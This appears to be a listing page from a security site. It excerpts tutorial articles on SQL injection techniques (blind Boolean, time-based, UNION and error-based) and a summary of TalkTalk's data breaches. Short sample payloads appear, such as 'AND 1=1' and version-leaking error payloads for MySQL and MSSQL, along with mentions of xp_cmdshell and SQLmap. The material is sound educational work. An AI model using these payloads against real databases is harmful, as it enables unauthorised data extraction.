Published: 05 August 2021    Last Updated: 03 July 2023

A cheat sheet of common Microsoft SQL payloads.

Published: 05 August 2021    Last Updated: 03 July 2023

A cheat sheet of common MySQL/MariaDB payloads.

Published: 19 October 2020    Last Updated: 03 July 2023

TalkTalk suffered a series of security issues in 2015. Right from the start of the year people were discussing an increased number of scam calls. On 26 February 2015 TalkTalk emailed customers to inform them of a data breach in which account numbers, addresses, and phone numbers were taken. The email detailed that a third-party contractor was believed to be responsible, and that TalkTalk was taking legal action against them. It was believed that “a few thousand” customers were affected.

On 10 August 2017, TalkTalk were fined again for failing to adequately protect personal data “because it allowed staff to have access to large quantities of customer’s data” which “left the data open to exploitation by rogue employees”.

Published: 19 October 2020    Last Updated: 05 July 2023

Blind injection refers to exploit where the output of the payload is not directly displayed within application output, but the threat actor is able to infer what the output was. This is possible with SQL injection and essentially involves asking the database a series of true/false (Boolean) questions to determine database content. A simple true/false can be something like:

AND 1=1
AND 1=2

If the difference between a true statement and a false statement is visible within the application response, then Boolean exploitation is possible. To enable this, Boolean statements need to be crafted which allow the attacker to infer what the database content is.

Published: 19 October 2020    Last Updated: 03 July 2023

In terms of crafting payloads, Time-based injection is very similar to Blind-Boolean injection. That is to say that extracting data from the database is generally done one character at a time. Time-based exploitation uses a function which causes a temporary pause in the database response; these differ depending on the database type.

This can then be used within an IF statement to execute Boolean statements against the database.

Published: 19 October 2020    Last Updated: 03 July 2023

UNION SELECT statements can be used for retrieving the results of a second SELECT statement by appending it to the end of another query. This is useful for SQL injection as it allows you to append a query to the end of a query executed by a developer to retrieve arbitrary database contents. It’s important to note that the details of the second query must match the first, specifically they must have the same number of columns and those columns must match in type.

Therefore the first step to exploiting SQL injection through UNION injection is to determine how many columns there are in the original query. This is possible in two main ways – either by creating a select statement and increasing the column count until the query executes or alternatively using “ORDER BY” syntax and increasing the column count until an error occurs – which implies that the number which causes an error is higher than the number of columns in use.

Published: 19 October 2020    Last Updated: 03 July 2023

With error-based injection, data can be extracted from the database where an error message can be crafted which contains confidential data. For example:

MySQL: AND ExtractValue('',Concat('=',@@version))
MSSQL: AND 1 in (@@version)

With the MSSQL payload above the intention is to cause a string to be converted to an integer – which may throw an error where the error will contain the contents of the string. With the MySQL payload above a similar thing is attempted however this is achieved through an XPath function.

Published: 19 October 2020    Last Updated: 05 July 2023

SQL Injection is an old vulnerability; first published on Christmas Day 1998 in Phrack Magazine 54. The issue occurs where user supplied input is insecurely concatenated into an SQL query. It generally allows a threat actor to perform any of the operations that the database user can execute – such as extracting, changing, or deleting database contents. Rarely, where the database user is highly privileged, this can allow for command execution through features such as the MSSQL xp_cmdshell system stored procedure.

Exploiting the issue manually is often trivial, but there are freely available public exploitation tools available – such as SQLmap.